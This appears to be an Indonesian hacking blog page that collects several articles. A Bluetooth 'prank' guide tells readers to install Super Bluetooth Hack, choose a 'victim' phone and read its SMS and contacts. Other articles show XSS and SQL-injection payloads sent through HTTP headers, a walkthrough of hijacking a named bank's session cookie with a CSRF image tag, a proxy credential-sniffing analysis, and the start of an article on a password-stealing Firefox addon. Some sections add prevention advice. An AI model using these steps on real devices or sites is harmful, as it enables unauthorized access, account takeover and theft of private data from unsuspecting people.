Popular Post

 photo mummymasterAnim_zps7bdcaa20.gif

Hacking Bluetooth

By : fauzan
Hacking Bluetooth 2010 / 2011 – Bluetooth Hacking 2010 / 2011
Welcome Back To MummyMaster.. Kzkzkz..
Gw mao berbagi & share lagi sama kalian kalian semua..
Klo yang udah pernah gak usah protes, klo yang belum pernah monggo di coba..
( Ok Coy!! <- Gaya Budi Handuk ) Wkwkwkkw… Hijack This!
Huammzz.. Setelah beberapa hari ngikut cyberwar, jenuh juga rasanya hidup gw ini. We win again from Israel in cyberwar.. Uye!! Hehe, akhirnya gw buat sebuah ke isengan lagi. Nyoba nyoba isengin bluetooth orang..
Oke lah semuanya, gak usah banyak basa basi kita lanjut ke tahap selanjutnya..
Pertama Anda harus Download dulu softwarenya,

Download Tipe Satu
Download Tipe Dua
Download Tipe Tiga


Yang bisa di lakuin klo lu install software itu:
Bisa buka dan baca SMS
Bisa Buka Phone Book
Bisa Ganti Profile
Bisa Maenin RIngtone
Bisa Maenin MP3
Bisa Restart Dan Matiin HP
Bisa Ganti Volume
Bisa Ngeblock Phone
Bisa Pura2 Nelpon Dari HP
Dan lain lainnya ( Ampir semua fasilitas bisa )
Wkwkwkw.. Kan lumayan klo cuma mo iseng2in orang :P Lucunya klo di HP orang yang punya bluetooth itu ada yang simpen b*k*p.. Wkwkwkwkw.. Lucu abis dah, waktu itu gw ngakak, abis gw maenin film yang itu dari HP orang via bluetoothnya.. Orangnya ampe kaget kaget, mana di kampus lagi.. Hahaha..  ( *Jadi inget waktu itu.. Gyahahaha.. )

Instructions

1.) Klo device dah konek, gunakan 0000 sebagai codenya
2.) Bluetooth harus turned on, sebelum loe jalanin BT application.
3.) Gunain Mozilla Untuk Download Softwarenya. ( Jangan lupa: File aslinya adalah *.jar )
Instalasi pake USB cable ( Sony Ericcson ):
1. Konekin HP ma Computernya.
2. Mount sebagai disk.
3. Drag  (SuperBluetoothHack_v108.jar) ke /MSSEMC/Media files/other/ .
4. Disconnekin USB.
5. Lanjut ke Folder “Other” di HP loe.
6. Cari Aplikasinya, Trus “Install”.
Instalasi General ( Super Bluetooth Hack Version )
1. Download
2. Copy ke mobile
3. Jalanin Installernya ( incidentally need JAVA )
4. Klo itu semuanya ada, loe baru bisa jalanin itu software
5. Pilih bahasa dan silakan di configure
6. Click Connection
7. Click Search Devices
8. Pilih the “Victim”
9. And Manage <- Korban telah di victim..
Untuk yang lain juga gak jauh beda, masing masing HP ada kriterianya sendiri. Loe coba cobain dah satu satu klo gak bisa. Soalnya gw gak punya banyak tipe HP.. Wkwkwkwk..
Klo dah ke install, silakan cari mangsa bluetooth HP orang lain yang lagi aktif. Haha.. Jangan Lupa Bluetooth Loe Aktifin dolo sebelum menjalankan aplikasinya.. Oke.. Selamat mencoba.. Semoga loe senang :P

Injecting Code Melalui HTTP Header

By : fauzan
Klien sebagai pengirim request memiliki kontrol penuh atas apa saja data yang dikirimkan ke server. Bila server lalai melakukan validasi input maka akibatnya bisa berbahaya. Umumnya attacker melakukan injeksi  melalui parameter pada GET atau form data pada POST. Padahal banyak jalan masuk lain yang bisa dicoba untuk menyerang server. Kali ini saya akan jelaskan bagaimana melakukan serangan XSS dan SQL injection dengan mengirimkan malicious tag/sql lewat header http.
Referer Header


Header ini berguna untuk menunjukkan dari mana request dilakukan. Contohnya ketika seseorang membuka halaman A, di dalamnya mengandung gambar yang lokasinya di B, maka browser akan me-request image di B dengan menambahkan referer header berisi url A. Header referer ini bisa dimanfaatkan untuk mencuri sessionid bila session id ditaruh di URL seperti pada webmail telkom.net/plasa.com. Tapi kali ini fokus kita adalah tentang injection bukan session hijacking, lain kali saya akan bahas di artikel khusus tentang itu.
Untuk melihat bagaimana header referer dipakai dalam request, saya gunakan contoh ipmonkey.com yang dibuka dengan browser Firefox+Live Http Header addon. Pada halaman ipmonkey.com ada image tag yang URLnya adalah ipmonkey.com/ipmonkey.gif. Karena image tersebut berada pada URL www.ipmonkey.com, maka request image tersebut ditambahkan referer header berisi url http://www.ipmonkey.com.

http://www.ipmonkey.com/ipmonkey.gif
 
GET /ipmonkey.gif HTTP/1.1
Host: www.ipmonkey.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.ipmonkey.com/
XSS bisa dilakukan dengan memasukkan script atau tag html di header ini. Bila ada web application yang menampilkan isi header referer tanpa di-filter, maka code xss kita berhasil diinjeksi. Sebagai contoh bisa dicoba di web http://pgl.yoyo.org/http/browser-headers.php. Web itu menampilkan header http tanpa difilter. Bagaimana cara menginjeksi header referer? Saya menggunakan addon Modify Header di Firefox. Coba tambahkan header Referer yang berisi javascript seperti pada gambar di bawah ini:
add referer headeradd referer header
Setelah header referer ditambahkan, ketika saya coba mengakses web http://pgl.yoyo.org/http/browser-headers.php, maka javascript saya akan dieksekusi browser, hasilnya seperti pada gambar berikut:
xssedxssed
Failed Attack on Feedjit
Lho kalau begitu kan serangan ini tidak ada gunanya karena harus mengubah header referer dulu, jadi cuma bisa xss di browser sendiri dong? Bagaimana caranya agar serangan jenis ini bisa menyerang orang lain? Agar serangan ini bisa berakibat ke orang lain, maka web application yang diserang haruslah menyimpan header referer pengunjungnya kemudian menampilkannya di halaman webnya.
feedjit widgetfeedjit widget
Saya belum menemukan contoh web yang menyimpan header referer pengunjung dan menampilkannya kembali dalam bentuk list. Namun agar bisa terbayang, saya gunakan contoh hipotetis saja Feedjit.com. Ingat, Feedjit tidak vulnerable terhadap serangan ini, jadi saya akan berikan contoh serangan xss saya yang gagal di feedjit sehingga anda bisa terbayang bagaimana akibatnya bila serangan itu berhasil.
Ada 3 hal penting yang ditampikan feedjit dalam widgetnya, yaitu:
  1. Daerah asal, yang ditunjukkan dengan bendera negara dan kotanya.
  2. Dari mana asal request berasa yang ditunjukkan dengan kalimat “arrived from”.
  3. Halaman apa yang sedang dibaca.
Dari ketiga elemen tersebut yang bisa kita kendalikan adalah asal request dan apa yang sedang dibaca. Sedangkan daerah asal ditentukan oleh IP address yang tidak bisa kita kendalikan. Kita mungkin bisa membuat kita tampak dari negara lain dengan proxy, tapi tetap saja yang muncul adalah bendera dan kota yang sudah fixed.
Sekarang saya coba untuk menginjeksi tag html melalui header referer dengan harapan akan muncul di widget tersebut. Pertama saya ubah dulu header referer dari addon Modify Header, kemudian saya klik salah astu artikel di ilmuhacking.com. Request yang terjadi yang disniff dengan Live http header adalah:
1
2
3
4
5
6
7
8
9
10
11
12
13
http://feedjit.com/router/?w=trafficList&ign=0&wn=1&cen=1&nv=1&fl=0&vid=new&rn=0&lg=1&u=http://www.ilmuhacking.com/web-security/menjebol-captcha-dengan-ocr/&r=http://<b>cobain</b>&t=Menjebol Captcha dengan OCR | Web Security | IlmuHacking.com&sw=1280&sh=960&fjv=2&rand=769547649
 
GET /router/?w=trafficList&ign=0&wn=1&cen=1&nv=1&fl=0&vid=new&rn=0&lg=1&u=http%3A%2F%2Fwww.ilmuhacking.com%2Fweb-security%2Fmenjebol-captcha-dengan-ocr%2F&r=http%3A%2F%2F%3Cb%3Ecobain%3C%2Fb%3E&t=Menjebol%20Captcha%20dengan%20OCR%20%7C%20Web%20Security%20%7C%20IlmuHacking.com&sw=1280&sh=960&fjv=2&rand=769547649 HTTP/1.1
Host: feedjit.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://<b>cobain</b>
Cookie: fjdt100=1232528992
Ketika kita membuka halaman yang mengandung widget feedjit, maka javascript yang ada akan mengirimkan request ke server feedjit.com yang berisi referer, judul artikel dan url artikel yang dibaca. Perhatikan URL yang direquest, 3 variabel yang mengirimkan data tersebut adalah:
u=http://www.ilmuhacking.com/web-security/menjebol-captcha-dengan-ocr/
r=http://<b>cobain</b>
t=Menjebol Captcha dengan OCR | Web Security | IlmuHacking.com
Parameter get u adalah URL untuk artikel yang saya baca, parameter r adalah referer, dan t adalah judul artikel. Saya mencoba menginjeksi tag html <b>cobain</b> , mari kita lihat apa yang nampak pada widget feedjit.
widget urlwidget url
xss failedxss failed
Ternyata tag html saya gagal diinjeksi karena sudah di-escape dengan benar. Seharusnya teks cobain dicetak tebal. Tapi ternyata <b>cobain</b> berubah menjadi bcobain, artinya injeksi gagal total.
if succeededif succeeded
Bayangkan bila injeksi ini berhasil. Maka halaman web yang mengandung widget ini bisa diinjeksi dengan script untuk mencuri cookie. Bila kebetulan admin sedang login, kemudian mengecek blognya, tentu cookie berisi sessionid dia akan terancam. Mari kita coba seandainya injection berhasil dengan mengubah htmlnya dengan addon Firebug. Tampilannya akan seperti pada gambar di samping. Itu baru tag bold bagaimana bila tag script? Tenu akibatnya akan fatal karena session bisa di-hijack. Beruntung untuk wordpress karena cookie session id di-set hanya dikirim bila path URL /wp-admin/ maka cookie tersebut tidak akan terkirim ketika admin sedang membaca artikel dalam keadaan login. Namun bila cookienya diset path / maka cookie dipastikan akan terkirim bila admin membaca artikel ketika sedang login.
Header User-Agent
Header ini menunjukkan jenis browser yang dipakai. Dalam user agent biasanya akan terlihat sistem operasinya juga. Hedaer ini biasanya sudah ditentukan oleh browser, namun dengan addon User Agent Switcher saya bisa mengubahnya menjadi teks apapun, termasuk menginjeksi script atau tag html.
Sebagai contoh sederhana bisa dicoba www.ipmonkey.com. Web ini menampilkan user agent dan ip address. Bila saya ganti user agent browser saya menjadi <script>alert(‘xssed’);</script> maka script saya akan dieksekusi browser seperti pada gambar di bawah ini:
xssed user agentxssed user agent
Seperti pada header referer, bila hanya serangan model begini tidak ada gunanya karena cuma bisa menyerang diri sendiri. Agar bisa menyerang orang lain, maka web application yang diserang harus menyimpan apa yang saya injeksi dan kemudian ditampilkan di webnya agar bisa dilihat orang lain. Sayangnya saya juga belum menemukan contoh web yang seperti itu. Contoh jenis web application yang menampilkan user-agent dalam webnya adalah cpanel. Namun ingat, cpanel tidak vulnerable terhadap serangan ini. Saya hanya memberi contoh hipotetis saja untuk ilustrasi saja.
Cpanel ada menu untuk melihat latest visitor yang menunjukkan ip address, url yang diakses, referer dan user agent. Saya akan coba menyisipkan script/tag html melalui user agent dan berharap cpanel menampilkannya tanpa filter. Hasilnya seperti pada gambar di bawah ini:
failed cpanel xss attackfailed cpanel xss attack
Terlihat bahwa tag script yang saya injeksikan telah diubah menjadi entity html &lt; dan &gt; sehingga tidak dieksekusi browser. Jadi serangan xss saya gagal total juga, hehe. Sebagai ilustrasi bila saya injeksikan tag <b>TEST</b><script>alert(‘xssed’);</script> dan bila tidak difilter, maka hasilnya akan tampak seperti gambar berikut:
header8
Halaman itu adalah salah satu halaman dalam cpanel, jadi hanya yang sudah login di cpanel yang bisa melihat latest visitor itu. Jadi bila script saya dieksekusi, maka saya bisa mengambil alih session cpanel orang itu. Untungnya (atau sayangnya) cpanel tidak vulnerable terhadap serangan ini.
SQL Injection via Header
Oke dari tadi saya hanya bicara tentang XSS, bagaimana dengan sql injection? Mungkinkah serangan sql injection dilakukan dari header referer dan user agent? Jawaban saya sangat MUNGKIN sekali. Karena tidak adanya contoh yang vulnerable terhadap sql injection dengan header referer/user-agent saya hanya menjelaskan konsepnya saja.
Bayangkan ada web application yang mencatat log visitornya dalam tabel bernama visitor. Field tabel visitor adalah id, ipaddress,useragent, referer dan time semuanya bertipe varchar kecuali id bertipe int dan time yang bertipe timestamp. Setiap ada pengunjung baru, php akan meng-insert ke tabel visitor dengan sql berikut:
$sql = "insert into visitor (ipaddress,useragent,referer) values('$ipaddress','$useragent','$referer')";
Dari ketiga variabel itu yang bisa dikendalikan hanyalah user agent dan referer sebab ip address tidak bisa kita ubah seenaknya. Kalau saya injeksikan code sql yang diawali dengan karakter single quote (‘) melalui header user agent atau referer, tentu akan malicious code sql saya akan berhasil.
Kesimpulan
Saya sudah tunjukkan cara untuk menginjeksikan malicious code melalui header http. Ada banyak jalan yang bisa dipakai untuk menyerang web application. Hacker selalu mencoba menginjeksikan malicious data/code melalui semua pintu yang tersedia. Aplikasi yang prosesnya bergantung dari masukan klien bisa jadi sasaran tembak hacker.
Agar selamat dari serangan hacker, semua input harus benar-benar dijaga. Jangan percaya begitu saja dengan input dari klien. Terapkan whitelist filter, semua masukan yang diluar daftar yang diperbolehkan agar direject.
Source: Ilmuhacking . com / Arif W.

Membajak Session Permata Net

By : fauzan
Hah? Apa nggak salah nih. Https kan secure,Namun dengan trik yang akan saya jelaskan ini kita akan bisa membajak session https.
Cookie Basic

Cookie merupakan teknik server untuk membuat browser “menyimpan” data di browser, dan meminta browser mengirimkannya kembali ke server berdasarkan kriteria tertentu. Cookie dikirimkan dari browser ke server atau dari server ke browser sebagai bagian dari request/response http yang disisipkan dalam header http.
Cookie terdiri dari beberapa field: name, value, path, domain, secure bit,expired time. Dalam sebuah request, apakah browser akan mengirimkan suatu cookie tergantung dari field-field tersebut, apakah expired atau belum, apakah URL yang di-request cocok dengan domain+path, dan apakah koneksi melalui https atau tidak.
Insecure Cookie
Cookie yang secure bitnya diaktifkan bukan artinya cookie tersebut di-enkrip. Field secure pada cookie, digunakan untuk membatasi pengiriman kembali data di cookie ke server hanya melalui koneksi https. Bila field ini dikosongkan, maka artinya cookie tersebut boleh dikirim kembali ke server pada koneksi http maupun https (any type of connection). Sedangkan bila secure bit diaktifkan, maka cookie tersebut haram dikirimkan melalui http.
Sniffing Cookie
Session hijacking dilakukan dengan mencuri sessionid. Dalam kasus ini saya membahas sessionid yang disimpan dalam cookie. Kalau seorang attacker berhasil mencuri cookie yang mengandung sessionid, maka session korban telah sukses dibajak attacker.
Salah satu cara mencuri cookie adalah dengan teknik sniffing, yaitu dengan menguping percakapan http yang dilakukan orang lain. Dengan sniffing paket http yang lalu lalang, maka orang bisa menjaring cookie. Namun sniffing cookie hanya bisa dilakukan pada koneksi yang tidak ter-enkrip, yaitu http biasa. Sniffing cookie tidak mungkin dilakukan pada koneksi https.
CSRF Attack to Trigger Cookie Sending over HTTP
Apabila cookie tidak di-set https only, artinya kita bisa memaksa korban membuat request http (bukan https) ke URL yang termasuk dalam domain+path cookie yang ditarget attacker sehingga dalam request tersebut cookie akan disertakan juga (naked, not encrypted).
Jangan kuatir, request tersebut tidak harus ke URL yang valid, bahkan ke URL yang tidak ada sekalipun cookie tetap dikirimkan asalkan URLnya termasuk dalam domain dan path cookie. Di sini kita tidak peduli dengan response, terserah server mau jawab apa (200 OK, 404 Not Found, 403 Forbidden dsb),  yang penting browser melakukan request yang mengandung cookie melalui koneksi yang tidak ter-enkrip.
CSRF attack adalah serangan yang mirip dengan XSS. Serangan ini hanya menerang client, dan tidak berpengaruh pada server. Inti dari serangan ini adalah pada REQUEST, yaitu bagaimana bisa membuat korban melakukan request HTTP untuk memaksa korban berbuat sesuatu yang tidak diinginkannya.
Salah satu metode yang populer dalam CSRF adalah dengan memanfaatkan tag image. Bila browser menemukan tag image, maka serta merta dia akan melakukan request ke isi dari attribut src, begitu juga bila javascript mengubah atribut src ini, maka browser juga akan melakukan request.
Triknya adalah dengan mengisi atribut src dengan URL yang termasuk dalam domain+path cookie yang ditarget, lalu mengirimkan halaman html yang mengandung tag image tersebut ke korban. Begitu korban membuka halaman itu, maka browsernya akan mengirimkan request tanpa disadari korban, that’s it CSRF.
Hijacking PermataNet Session

warningwarning
PermataNet adalah situs internet banking bank permata. Web server PermataNet menerima koneksi yang masuk melalui http maupun https, namun setiap koneksi yang masuk melalui kanal http, akan diberi peringatan dan di-redirect menuju koneksi https. Ini bagus, mendidik user untuk selalu menggunakan https di situsnya. Namun bila tidak hati-hati justru ini menjadi celah.
Kenapa saya sebut ini adalah celah? Karena dengan membuka dua kanal, maka memungkinkan bagi seseorang untuk mengirimkan http request (bukan https). Bila cookie tidak diset https only, maka ada peluang naked cookie terkirim melalui jaringan.
Ketika browser membuka http://www.permatanet.com , maka server akan menjawab dengan HTTP 403 (Access Forbidden). Pada tahap ini tidak ada cookie yang diminta server untuk disimpan browser.
Selanjutnya browser akan membuka koneksi ke URL: https://www.permatanet.com/login/login.asp . Berikut percakapan yang terjadi:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
https://www.permatanet.com/login/login.asp
 
GET /login/login.asp HTTP/1.1
Host: www.permatanet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.0.5) Gecko/2008120122 YFF3 Firefox/3.0.5 ImageShackToolbar/5.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
 
HTTP/1.x 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 10 Jan 2009 07:54:35 GMT
Content-Length: 18481
Content-Type: text/html
Expires: Sat, 10 Jan 2009 07:54:36 GMT
Set-Cookie: ASPSESSIONIDSSDCARRA=OJBNBHIDDICNKDOODCAKBPKJ; path=/
Cache-Control: private
Perhatikan header Set-Cookie pada response yang artinya: “Hey browser! tolong simpan data ini, dan kirimkan kembali ke aku setiap  kamu request ke host  www.permatanet.com, lewat koneksi http atau https terserah.”
Cookie ini adalah cookie yang menyimpan sessionid, jadi kalau ingin membajak session PermataNet, attacker harus mencuri cookie ini. Setelah saya login (saya memang nasabah permata), cookie itu tetap menjadi tempat penyimpanan session id saya.
Oke, sekarang saya sudah login, itu artinya session established, dan isi cookie itu adalah kunci untuk membajak account saya.
Untuk mencuri cookie tersebut, pertama attacker harus sudah siap men-sniff jaringan saya. Kemudian attacker harus menunggu sampai saya berbuat kesalahan fatal, yaitu mengirim request yang mengandung cookie tersebut tanpa ter-enkripsi.
Sebagai contoh mari kita buat jebakan berupa tag image yang URLnya mengarah pada logo permatanet. Logo tersebut aslinya URLnya adalah:
https://www.permatanet.com/login/images/logo_permatanet.jpg , namun karena server permatanet membuka juga koneksi ke http, maka URLnya bisa juga menjadi:
http://www.permatanet.com/login/images/logo_permatanet.jpg (tanpa http).
Setiap request dengan http ke server PermataNet selalu dijawab dengan Forbidden Error (403). Tapi itu tidak penting, yang penting adalah request, bukan response.
Bila saya siapkan sebuah halaman html yang mengandung tag berikut:
<img src="http://www.permatanet.com/login/images/logo_permatanet.jpg" />
Lalu html ini saya kirim melalui email, atau korban terbujuk untuk membuka halaman itu, maka browser korban akan mengirimkan request ke server permatanet melalui koneksi http. Bila korban saat itu sedang login (session masih valid), maka sessionid korban akan terbang tanpa perlindungan.
Kalau kita coba buka url tersebut di browser, kita lihat apa yang dikirimkan browser saya dan diresponse server PermataNet:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
http://www.permatanet.com/login/images/logo_permatanet.jpg
 
GET /login/images/logo_permatanet.jpg HTTP/1.1
Host: www.permatanet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.0.5) Gecko/2008120122 YFF3 Firefox/3.0.5 ImageShackToolbar/5.0.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: id,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: ASPSESSIONIDSSDCARRA=OJBNBHIDDICNKDOODCAKBPKJ;HalJini=main
 
HTTP/1.x 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Fri, 09 Jan 2009 07:10:03 GMT
Connection: close
Content-Length: 1873
Content-Type: text/html
Benar kan, error 403 Forbidden. Itu artinya URL itu dilarang keras diakses. Tapi lihat header Cookie pada request yang dilakukan browser. Ternyata cookie ini tetap dikirimkan ke server melalui koneksi http biasa. Ya iya laah, request ini kan ke URL yang masuk dalam domain+path cookie, dan server PermataNet tidak mensyaratkan harus dengan https.
Dengan terjadinya request ini, attacker dengan mudah mengkopi isinya, dan memasukkan ke browsernya sehingga ketika dia membuka halaman PermataNet maka yang terbuka adalah account saya. Sungguh berbahaya!
Pencegahan
Bagaimana cara mencegah agar cookie kita tidak tercuri? Kita harus mengubah cookie PermataNet di browser kita menjadi “Https Only”. Bagi pengguna Firefox ini mudah, dengan Addon Cookie Editor kita bisa bebas meng-edit cookie.
Kesimpulan
Anda telah melihat bahwa men-set bit cookie menjadi https only sangat-sangat penting. Hal ini berbeda bila server tidak membuka koneksi di port 80, sehingga walaupun cookie diset any connection, tetap hanya bisa di https karena port 80 closed.
Selain PermataNet, situs PayPal.com juga mengalami masalah yang sama, silakan investigasi sendiri sebagai latihan dan tuliskan hasilnya sebagai komentar di sini.
Source: ilmu hacking .com / arif w

Bahaya Memakai Tunnel

By : fauzan



Beberapa waktu yang lalu ketika lagi ramai kasus film Fitna, pemerintah memilih untuk memblok akses ke situs-situs seperti Multiply dan Youtube. Namun masyarakat tidak kekurangan akal, mereka menggunakan teknik tunneling atau proxying memanfaatkan proxy gratisan yang ada.
Tanpa disadari penggunaan http proxy gratis di internet memilih bahaya yang serius. Keleluasaan browsing dan anonimitas dibayar dengan resiko keamanan. Salah satu contoh situs yang banyak dipakai adalah vtunnel. Dalam situsnya vtunnel menjelaskan tujuan dibuatnya vtunnel:



Vtunnel is here to help you get to the websites you want to go to online. Many organizations these days block access to sites like myspace, gmail, even google search!
Ada harga yang harus dibayar untuk mendapatkan akses ke situs yang diblok dan anonimitas, yaitu berupa bahaya/resiko keamanan. Mari kita analisa, bahaya apa saja yang dihadapi jika menggunakan http proxy seperti vtunnel.
Analisa Traffic VTunnel
multiply via vtunnel
multiply via vtunnel
Sebagai contoh kasus kita akan gunakan Vtunnel untuk mengakses multiply. Saya akan mencoba login ke multiply dan melihat hasil sniffing, apa yang terjadi dengan password saya. Saya menggunakan Firefox addon Live HTTP Headers untuk sniffing traffic http.
Ketika pertama kali mengakses multiply.com melalui vtunnel, traffic HTTP yang terjadi adalah:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
http://vtunnel.com/index.php/1000110A/e266be200f05de6fd0e4b5f65915000
 
POST /index.php/1000110A/e266be200f05de6fd0e4b5f65915000 HTTP/1.1
Host: vtunnel.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.0.5) Gecko/2008120122 YFF3 Firefox/3.0.5 ImageShackToolbar/5.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://vtunnel.com/index.php/1000110A/f23fba224f10d22cd7f9a4e8540e55dcce4515000
Cookie: PBBXVR%3bhvq%3b%2f%3b%2ezhygvcyl%2epbz=N%3a1%3aH2SfqTIxK185ouV0bm96LKvY8ir7okeeYx2kkhCn0%2dGVzLer%2ejoOpN%253q%253q%3axcstfunnfqpxbduk1ifjk1c%3b; PBBXVR%3bfrffvba%3b%2f%3b%2ezhygvcyl%2epbz=1230853917%3a%3a1230854288%3a3%3a%3a%3b; PBBXVR%3bynathntr%3b%2f%3b%2ezhygvcyl%2epbz=ra%3b; __utma=215606864.1997469935593267000.1230852901.1230852901.1230852901.1; __utmb=215606864.7.10.1230852901; __utmc=215606864; __utmz=215606864.1230852901.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=vtunnel%20proxy; ym_pop_freq_expiration303649=Fri, 02 Jan 2009 23:51:22 GMT; ym_pop_freq303649=3
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
username=http%3A%2F%2Fmultiply.com%2F&r4=+checked&fa=&br=on&if=+checked
 
HTTP/1.x 302 Moved Temporarily
Date: Fri, 02 Jan 2009 00:07:43 GMT
Location: http://vtunnel.com/index.php/1000110A/f23fba224f10d22cd7f9a4e8540e55dcce4515000
X-Cache: MISS from fdc14.freeproxies.org
Connection: close
Tidak ada yang penting dalam transaksi di atas. Karena memang hanya membuka halaman login multiply. Setelah halaman login terbuka, kini saya coba memasukkan username:soekiki (ini user saya sendiri) dan password:password123 (ini password ngasal).
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
http://vtunnel.com/index.php/1000110A/f23fba224f10d22cd7f9a4e8540e55dcce45b62ab012669affc09f0df015000
 
POST /index.php/1000110A/f23fba224f10d22cd7f9a4e8540e55dcce45b62ab012669affc09f0df015000 HTTP/1.1
Host: vtunnel.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.0.5) Gecko/2008120122 YFF3 Firefox/3.0.5 ImageShackToolbar/5.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://vtunnel.com/index.php/1000110A/f23fba224f10d22cd7f9a4e8540e55dcce4515000
Cookie: PBBXVR%3bhvq%3b%2f%3b%2ezhygvcyl%2epbz=N%3a1%3aH2SfqTIxK185ouV0bm96LKvY8ir7okeeYx2kkhCn0%2dGVzLer%2ejoOpN%253q%253q%3axcstfunnfqpxbduk1ifjk1c%3b; PBBXVR%3bfrffvba%3b%2f%3b%2ezhygvcyl%2epbz=1230853917%3a%3a1230854864%3a4%3a%3a%3b; PBBXVR%3bynathntr%3b%2f%3b%2ezhygvcyl%2epbz=ra%3b; __utma=215606864.1997469935593267000.1230852901.1230852901.1230852901.1; __utmb=215606864.8.10.1230852901; __utmc=215606864; __utmz=215606864.1230852901.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=vtunnel%20proxy; ym_pop_freq_expiration303649=Fri, 02 Jan 2009 23:51:22 GMT; ym_pop_freq303649=3
Content-Type: application/x-www-form-urlencoded
Content-Length: 315
form%3A%3Asignin=signin&form%3A%3Asignin%3A%3Acount=1&signin%3A%3Axurl=&signin%3A%3Aremember_me_for=604800000&signin%3A%3Asecure-token=388%3AU2FsdGVkX185bhI0oz96YWDkcTPpxLMHgsq1CMtog0AwDTOI1QOvf5VbKe3OVwXE&signin%3A%3Aid=soekiki&signin%3A%3Apassword=password123&signin%3A%3Aremember=on&omniture_submission=submitted
 

HTTP/1.x 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Date: Fri, 02 Jan 2009 00:20:33 GMT
Server: Apache/1.3.29 (Unix) mod_perl/1.29
Set-Cookie: PBBXVR%3bynfg_npprff%3b%2f%3b%2ezhygvcyl%2epbz=1230855633%3b; path=/index.php/
Content-Type: text/html; charset=utf-8
X-Cache: MISS from multiply.com, MISS from fdc14.freeproxies.org
Connection: close
Perhatikan pada baris ke-16, terdapat parameter data yang dikirimkan melalui POST request. Pada baris tersebut terdapat variable id dan password yang berisi username multiply dan password yang saya masukkan.
id=soekiki&signin%3A%3Apassword=password123&signin%3A%3Aremember=on
Nah dalam http post di atas jelas terlihat bahwa password dan username saya akan dikirimkan melalui HTTP POST request ke server vtunnel. Setelah tiba di server vtunnel, baru kemudian user dan password saya akan dikirimkan ke server multiply.
Kesimpulan
Dalam analisa traffic di atas jelas terlihat bahwa data credentials saya (username dan password) selalu dikirimken ke vtunnel, bukan ke multiply. Memang begitulah cara kerja HTTP proxy/tunnel, istilahnya adalah Man in The Middle.
Bahaya Man in The Middle tidak hanya ketika melakukan request, namun response juga sama saja. Singkatnya, response adalah apa yang anda terima dari server anda, bisa berupa file yang saya download, atau halaman web yang saya baca. Semua itu dikirimkan dari multiply bukan ke saya, namun ke vtunnel dulu, baru kemudian diteruskan ke saya.
Dalam artikel ini saya hanya membahas contoh vtunnel dan multiply hanya sebagai contoh saja, sebenarnya semua http proxy bekerja dengan cara yang sama. Ketika anda melakukan login melalui proxy, maka data rahasia anda akan dilewatkan melalui proxy anda.
Source: ilmuhacking . com

Menjaring Password Dengan Firefox Sniffer

By : fauzan
firefox adalah browser andalan saya, terutama untuk urusan penetration testing. Firefox memiliki banyak sekali addon/extension yang sangat membantu untuk bermacam-macam urusan. Namun tidak semua addon membantu pengguna, ada juga addon yang menyadap dan mengirimkan username/password pengguna ketika login ke email attacker, addon itu adalah FFsniFF.
Dalam artikel ini saya akan menunjukkan simulasi penyadapan password di browser korban dan mengirimkan hasil sadapannya ke email saya di ilmuhacking.com. Setelah itu saya akan jelaskan cara kerja FFsniFF dengan membedah source codenya.
Sekilas tentang addon Firefox

Addon firefox adalah program dalam javascript yang diload dan diaktifkan setiap firefox dijalankan. Addon ini diperlukan untuk melakukan hal-hal yang tidak disediakan oleh firefox (firefox hanya menyediakan fungsi-fungsi dasar saja). Antarmuka addon ada yang berbentuk ikon di status bar, toolbar atau boleh juga tidak memiliki antarmuka sama sekali. FFsniFF adalah contoh addon yang tidak memiliki antarmuka pengguna sama sekali, hal ini bisa dimaklumi karena memang addon ini harus bersifat stealth.
